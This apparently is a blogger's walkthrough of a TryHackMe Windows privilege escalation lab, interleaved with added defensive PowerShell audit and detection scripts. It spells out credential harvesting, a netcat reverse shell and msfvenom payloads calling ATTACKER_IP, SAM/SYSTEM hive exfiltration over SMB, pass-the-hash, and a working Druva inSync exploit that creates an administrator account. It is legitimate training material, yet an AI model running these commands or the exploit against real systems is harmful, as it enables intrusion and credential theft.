It is time to look at the Windows Privilege Escalation room on TryHackMe, a medium-level room in which we learn how to escalate our privileges on a Windows machine. I don’t know about you, but I am looking forward to this one. I have historically been stronger at Linux machines, so there is a bunch to learn.
I am making these walkthroughs to keep myself motivated to learn cyber security, and ensure that I remember the knowledge gained by these challenges on HTB and THM.
Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.
Task 1: Introduction
During a penetration test, you will often have access to some Windows hosts with an unprivileged user. Unprivileged users will hold limited access, including their files and folders only, and have no means to perform administrative tasks on the host, preventing you from having complete control over your target.
This room covers fundamental techniques that attackers can use to elevate privileges in a Windows environment, allowing you to use any initial unprivileged foothold on a host to escalate to an administrator account, where possible.
If you want to brush up on your skills first, you can have a look through the Windows Fundamentals Module or the Hacking Windows Module.
Answer: No answer needed
Task 2: Windows Privilege Escalation
Some quick theory here. Let’s get these questions answered and move on.
Users that can change system configurations are part of which group?
Answer: Administrators
The SYSTEM account has more privileges than the Administrator user (aye/nay)
The system account has full access to all files and resources available on the host with even higher privileges than administrators.
Answer: aye
Task 3: Harvesting Passwords from Usual Spots
The main point to learn in this task is that there are plenty of places to look for passwords on a Windows system. Examples covered here are unattended installation config files, PowerShell history, saved Windows credentials, IIS configuration files, and saved credentials from software such as PuTTY. Let’s move on.
A password for the julia.jones user has been left on the Powershell history. What is the password?
To read the PowerShell history we enter the following command:
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
There on line 6 we find her password.
Answer: ZuperCkretPa5z
A web server is running on the remote host. Find any interesting password on web.config files associated with IIS. What is the password of the db_admin user?
According to the task, there are two possible locations where we can find these web.config files:
- C:\inetpub\wwwroot\web.config
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
The first one does not exist on the system, but if we run the command with the second location we find a connectionString:
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
To be exact, we find this, including the password:
<add connectionString="Server=thm-db.local;Database=thm-sekure;User ID=db_admin;Password=098n0x35skjD3" name="THM-DB" />
Answer: 098n0x35skjD3
There is a saved password on your Windows credentials. Using cmdkey and runas, spawn a shell for mike.katz and retrieve the flag from his desktop.
The instructions tell us exactly what to do. Start with cmdkey to see for which users we have saved credentials:
cmdkey /list
Sure enough, we have a saved credential for mike.
Now run the following command to run cmd with his credentials:
runas /savecred /user:mike.katz cmd.exe
There we go. Now find the flag on mike.katz’s Desktop:
Answer: THM{WHAT_IS_MY_PASSWORD}
Retrieve the saved password stored in the saved PuTTY session under your profile. What is the password for the thom.smith user?
This one is also described literally in the task. Run the following command to search the PuTTY sessions registry key for any value whose name contains Proxy (which includes ProxyPassword):
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
Cool pass, indeed!
Answer: CoolPass2021
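A defender-side counterpart to this task, as an added example that is not from the room or the original post: a PowerShell audit that reports the same usual spots (PSReadline history, web.config, cmdkey, PuTTY sessions) on the local host with every secret masked, so the credentials can be removed. It assumes the default paths the task lists; Hide-Secret and Find-CredentialSpots are names chosen here.

```powershell
# Added example (not the room's or the original post's code): report the credential
# "usual spots" from Task 3 on the local host so they can be cleaned up. Secret values
# are masked; only the location is reported. Assumes the default paths the task lists.

function Hide-Secret([string]$s) {
    if ($s.Length -le 2) { return '**' }
    return $s.Substring(0, 1) + ('*' * ($s.Length - 2)) + $s.Substring($s.Length - 1)
}

function Find-CredentialSpots {
    $report = @()
    # 1. PSReadline history: flag lines carrying the flags/verbs that usually include a password.
    $hist = "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt"
    if (Test-Path $hist) {
        $n = 0
        foreach ($line in Get-Content $hist) {
            $n++
            if ($line -match '(?i)(-password|/user:|net\s+user\s+\S+\s+\S+|ConvertTo-SecureString|pass\w*\s*[=:])') {
                $report += "[PSHistory] line $n of $hist matches '$($Matches[1])'"
            }
        }
    }
    # 2. IIS / .NET web.config connection strings with an inline password.
    $configs = 'C:\inetpub\wwwroot\web.config',
               'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config'
    foreach ($cfg in ($configs | Where-Object { Test-Path $_ })) {
        foreach ($m in [regex]::Matches((Get-Content $cfg -Raw), '(?i)Password=([^;"'']+)')) {
            $report += "[web.config] $cfg stores a plaintext password ($(Hide-Secret $m.Groups[1].Value))"
        }
    }
    # 3. Saved Windows credentials that runas /savecred can use.
    foreach ($line in ((cmdkey /list) -match '^\s*(Target|User):')) {
        $report += "[cmdkey] $($line.Trim())"
    }
    # 4. PuTTY sessions that store a proxy password in the registry.
    $base = 'HKCU:\Software\SimonTatham\PuTTY\Sessions'
    if (Test-Path $base) {
        foreach ($s in Get-ChildItem $base) {
            $pw = (Get-ItemProperty -Path $s.PSPath).ProxyPassword
            if ($pw) { $report += "[PuTTY] session $($s.PSChildName) stores ProxyPassword $(Hide-Secret $pw)" }
        }
    }
    return $report
}

Find-CredentialSpots
```

Run it in the context of each user profile you want to check, since the history file and the PuTTY key are per user.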
Task 4: Other Quick Wins
This task is all about abusing Task Scheduler tasks that have been configured to run an executable file that we can change to run a netcat reverse shell.
What is the taskusr1 flag?
Let’s start by getting info on the scheduled task called “vulntask”.
schtasks /query /tn vulntask /fo list /v
As discussed in the task description, we can edit the file if we have the correct permissions. To check these we run the following command:
icacls c:\tasks\schtask.bat
Now all we need to do is echo the nc64 command to the schtask.bat file to overwrite its content. Remember to change the ip.
echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat
And setup a listener on your attacker machine:
nc -lvnp 4444
Finally, run the scheduled task with:
schtasks /run /tn vulntask
And yes, we got a connection:
And find the flag:
Answer: THM{TASK_COMPLETED}
Task 5: Abusing Service Misconfigurations
This part covers three different service misconfigurations, and each vulnerability has a question related to it.
Get the flag on svcusr1’s desktop.
Once again, we can follow the steps from the covered theory:
sc qc WindowsScheduler
The binary path is mentioned. Now we check the permissions:
icacls C:\PROGRA~2\SYSTEM~1\WService.exe
The Everyone group has modify permissions (M) on the service’s executable. This means we can simply overwrite it with any payload of our preference, and the service will execute it with the privileges of the configured user account.
Now we need to fulfil the following tasks:
1. Create a reverse shell payload:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4445 -f exe-service -o rev-svc.exe
2. Set up a Python web server:
python3 -m http.server
3. Get the binary from the attacker machine onto the target:
wget http://ATTACKER_IP:8000/rev-svc.exe -O rev-svc.exe
4. On the target machine, rename the original binary, move the payload to its location and give it the right permissions (making sure you are using PowerShell):
cd C:\PROGRA~2\SYSTEM~1\
move WService.exe WService.exe.bkp
move C:\Users\thm-unpriv\rev-svc.exe WService.exe
icacls WService.exe /grant Everyone:F
5. On your attacker machine, set up a reverse listener:
nc -lvnp 4445
6. On the target machine, restart the service:
sc stop windowsscheduler
sc start windowsscheduler
7. Catch the shell on the listener:
And there we can find the flag:
Answer: THM{AT_YOUR_SERVICE}
Get the flag on svcusr2’s desktop.
Now it is time to abuse unquoted service paths. The process is quite similar. We place a binary in a location that gets called because a service does not correctly specify its BINARY_PATH_NAME (it is not wrapped in double quotes), causing our payload to be executed instead. Again, we need to build a payload with msfvenom, download it from our attacker machine, set up a listener, and restart the service.
The problem is with the following service:
sc qc "disk sorter enterprise"
If we check the permissions on the directory in the binary path, we can see that we have write privileges:
icacls c:\MyPrograms
There we can do as follows on our machine:
# Create payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4446 -f exe-service -o rev-svc2.exe
# Setup a server
python3 -m http.server
Then we download the file on our target machine:
wget http://ATTACKER_IP:8000/rev-svc2.exe -O rev-svc2.exe
Setup a listener on our attacker machine:
# Setup listener
nc -lvp 4446
Move the file and give it permissions:
move C:\Users\thm-unpriv\rev-svc2.exe C:\MyPrograms\Disk.exe
icacls C:\MyPrograms\Disk.exe /grant Everyone:F
And stop and start the service:
sc stop "disk sorter enterprise"
sc start "disk sorter enterprise"
And we got a reverse shell:
As before, find the flag on svcusr2’s desktop located at C:\Users\svcusr2\Desktop.
Answer: THM{QUOTES_EVERYWHERE}
Get the flag on the Administrator’s desktop.
You know the drill by now. It is very similar to the last two questions:
1. Create a payload:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4447 -f exe-service -o rev-svc3.exe
2. Start a server:
python3 -m http.server
3. Start a listener:
nc -lvp 4447
4. Download the file from PowerShell:
wget http://10.10.121.104:8000/rev-svc3.exe -o rev-svc3.exe
5. Grant permissions:
icacls C:\Users\thm-unpriv\rev-svc3.exe /grant Everyone:F
6. In your cmd configure the binPath:
sc config THMService binPath= "C:\Users\thm-unpriv\rev-svc3.exe" obj= LocalSystem
7. Stop and start the service:
sc stop THMService
sc start THMService
You should have received a reverse shell:
Now find the flag on the administrator’s desktop:
Answer: THM{INSECURE_SVC_CONFIG}
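As an added example that is not from the room or the original post, here is a PowerShell audit that looks for the weaknesses exploited in Tasks 4 and 5 (a writable scheduled-task action, a writable service binary, an unquoted service path with writable ancestor directories, and a service DACL that lets low-privileged principals change its configuration) so they can be fixed. It assumes a local run with enough rights to read service configs, task definitions and ACLs; Test-WeakAcl and Get-ServiceExe are names chosen here.

```powershell
# Added example, not the room's or the original post's code: audit the host for the
# weaknesses abused in Tasks 4 and 5 (writable task actions, writable service binaries,
# unquoted service paths, weak service DACLs). Assumes a local run with rights to read them.
$weak = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'
$writeMask = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl'

# Return a finding string if a low-privileged principal can write to $Path, else $null.
function Test-WeakAcl([string]$Path) {
    if (-not $Path -or -not (Test-Path -LiteralPath $Path)) { return $null }
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -eq 'Allow' -and $weak -contains $ace.IdentityReference.Value -and
            ($ace.FileSystemRights -band $writeMask) -ne 0) {
            return "$($ace.IdentityReference) has $($ace.FileSystemRights) on $Path"
        }
    }
}

# Pull the executable out of a service command line; an unquoted path with spaces is the Task 5 bug.
function Get-ServiceExe([string]$PathName) {
    if ($PathName -match '^\s*"([^"]+)"') { return @{ Path = $Matches[1]; Unquoted = $false } }
    $exe = if ($PathName -match '^(.*?\.exe)') { $Matches[1] } else { ($PathName -split ' ')[0] }
    return @{ Path = $exe; Unquoted = ($exe -match ' ') }
}

$findings = @()
foreach ($svc in Get-CimInstance Win32_Service) {
    $exe = Get-ServiceExe $svc.PathName
    if ($exe.Unquoted) {
        $findings += "[UnquotedPath] $($svc.Name): $($svc.PathName)"
        $dir = Split-Path $exe.Path   # every ancestor directory is a spot where a spoofed binary could be planted
        while ($dir) { $hit = Test-WeakAcl $dir; if ($hit) { $findings += "[WritableDir] $($svc.Name): $hit" }; $dir = Split-Path $dir }
    }
    $hit = Test-WeakAcl $exe.Path
    if ($hit) { $findings += "[WritableBinary] $($svc.Name) runs as $($svc.StartName): $hit" }
    # Service DACL in SDDL: DC (change config) or GA granted to Everyone/AuthUsers/Users/Interactive.
    if ((sc.exe sdshow $svc.Name | Out-String) -match '\(A;;(?:[A-Z]{2})*(?:DC|GA)(?:[A-Z]{2})*;;;(WD|AU|BU|IU)\)') {
        $findings += "[WeakServiceDacl] $($svc.Name): $($Matches[1]) may change its configuration"
    }
}
# Scheduled tasks: the action executable (Task 4's schtask.bat) must not be writable either.
foreach ($task in Get-ScheduledTask | Where-Object State -ne 'Disabled') {
    foreach ($a in $task.Actions) {
        if (-not $a.Execute) { continue }
        $hit = Test-WeakAcl ([Environment]::ExpandEnvironmentVariables($a.Execute.Trim('"')))
        if ($hit) { $findings += "[WritableTaskAction] $($task.TaskName) runs as $($task.Principal.UserId): $hit" }
    }
}
$findings
```

Each finding maps to a fix already implied by the room: quote the path (sc config ... binPath= "..."), tighten the file ACL with icacls, or reset the service DACL with sc sdset.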
Task 6: Abusing dangerous privileges
Get the flag on the Administrator’s desktop.
In this task, we can decide between three different methods: SeBackup / SeRestore, SeTakeOwnership, and SeImpersonate / SeAssignPrimaryToken. I will pick the Backup route as it seems to involve a few techniques I find great to learn.
RDP into the target machine, for example by using Remmina on your AttackBox. When logged in you can go ahead and run a command prompt as administrator.
You should now be able to see your privileges with the command:
whoami /priv
Bypass traverse checking allows us to back up the SAM and SYSTEM hives (which hold the password hashes) with the following commands:
reg save hklm\system C:\Users\THMBackup\system.hive
reg save hklm\sam C:\Users\THMBackup\sam.hive
Make sure the backups are in the directory:
Now we need to get them over to your AttackBox. We can do this using SMB. We can use impacket’s smbserver.py to start a simple SMB server with a network share in the current directory of our AttackBox.
Run the following commands:
mkdir share
python3.9 /opt/impacket/examples/smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share
Tip: I had problems with impacket warning me that the address was already in use. In this case run the following commands and try again:
sudo lsof -i :445
# If this command shows a process using port 445 (the default SMB port), note its PID.
sudo kill -9 <PID>
Now run the following commands to copy the backups to your attacker machine.
copy C:\Users\THMBackup\sam.hive \\ATTACKER_IP\public\
copy C:\Users\THMBackup\system.hive \\ATTACKER_IP\public\
We can now use impacket to retrieve the users’ password hashes:
cd share
python3.9 /opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL
Finally, we can do a Pass-the-Hash attack by passing the Administrator hash in the following command (please use the correct hash if it does not fit your results):
python3.9 /opt/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:13a04cdcf3f7ec41264e568127c5ca94 administrator@10.10.1.125
Now we only need to find the flag on the Administrator’s Desktop:
There we go!
Answer: THM{SEFLAGPRIVILEGE}
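The hive dump in this task seen from the blue team, as an added example that is not from the room or the original post: PowerShell detection logic that flags reg save of the SAM/SYSTEM/SECURITY hives and copies of the resulting .hive files to a network share, first over constructed sample command lines and then over real 4688 process-creation events. It assumes command-line auditing is enabled and that the command line is property index 8 of the 4688 event; Test-HiveDumpCommand and Get-HiveDumpEvents are names chosen here.

```powershell
# Added example, not the room's or the original post's code: detect the SeBackup-style
# hive dump from Task 6. Assumes "Include command line in process creation events" is on.
$hiveDumpPatterns = @(
    '(?i)\breg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b',   # reg save hklm\sam ...
    '(?i)\b(sam|system|security)\.hive\b.*\\\\[^\\]+\\[^\\]+\\',    # hive file copied to a UNC share
    '(?i)secretsdump|vssadmin\s+create\s+shadow'                    # common follow-ups
)

# True when a process command line matches one of the hive-dump patterns.
function Test-HiveDumpCommand([string]$CommandLine) {
    foreach ($p in $hiveDumpPatterns) { if ($CommandLine -match $p) { return $true } }
    return $false
}

# Constructed sample command lines (not taken from a real log) to exercise the detector.
$samples = @(
    'reg save hklm\system C:\Users\THMBackup\system.hive',
    'reg  save  HKLM\SAM C:\Users\THMBackup\sam.hive',
    'cmd.exe /c copy C:\Users\THMBackup\sam.hive \\10.0.0.5\public\',
    'reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run',
    'notepad.exe C:\Users\THMBackup\notes.txt'
)
$samples | ForEach-Object { '{0,-5} {1}' -f (Test-HiveDumpCommand $_), $_ }

# Against the real Security log: 4688 events carry the command line (property index 8
# on current Windows versions) when command-line auditing is enabled.
function Get-HiveDumpEvents([int]$Hours = 24) {
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = (Get-Date).AddHours(-$Hours) } -ErrorAction SilentlyContinue |
        Where-Object { Test-HiveDumpCommand $_.Properties[8].Value } |
        ForEach-Object { [pscustomobject]@{ Time = $_.TimeCreated; User = $_.Properties[1].Value; CommandLine = $_.Properties[8].Value } }
}
```

The first three samples are flagged and the last two are not; on a real host, pair the alert with a review of who holds SeBackupPrivilege (Backup Operators membership) so the privilege is limited to accounts that need it.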
Task 7: Abusing vulnerable software
This is the final practical task in this room, and it’s a short one. Let’s go. We are in the endgame now.
Get the flag on the Administrator’s desktop.
The theory mentions the following exploit:
$ErrorActionPreference = "Stop"
$cmd = "net user pwnd SimplePass123 /add & net localgroup administrators pwnd /add"
$s = New-Object System.Net.Sockets.Socket(
[System.Net.Sockets.AddressFamily]::InterNetwork,
[System.Net.Sockets.SocketType]::Stream,
[System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)
$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");
$length = [System.BitConverter]::GetBytes($command.Length);
$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)
All we need to do is run this exploit on the target machine in a PowerShell console.
The exploit will create the user pwnd with the password SimplePass123 and add it to the Administrators group. If the exploit was successful, we should be able to run the following command to verify that the user exists and is part of the Administrators group:
net user pwnd
This is the case. Now we can run a command prompt as administrator. When prompted for credentials, use the pwnd account.
From the new command prompt, you can retrieve your flag from the Administrator’s desktop with the following command:
type C:\Users\Administrator\Desktop\flag.txt
There we have it 🙂
Answer: THM{EZ_DLL_PROXY_4ME}
Congratulations, we are done! Tasks 8 and 9 do not have any assignments so we will not cover those.
It was great to learn some Windows privilege escalation techniques, and I hope you learned at least as much as I did.
See you next time. Happy hacking!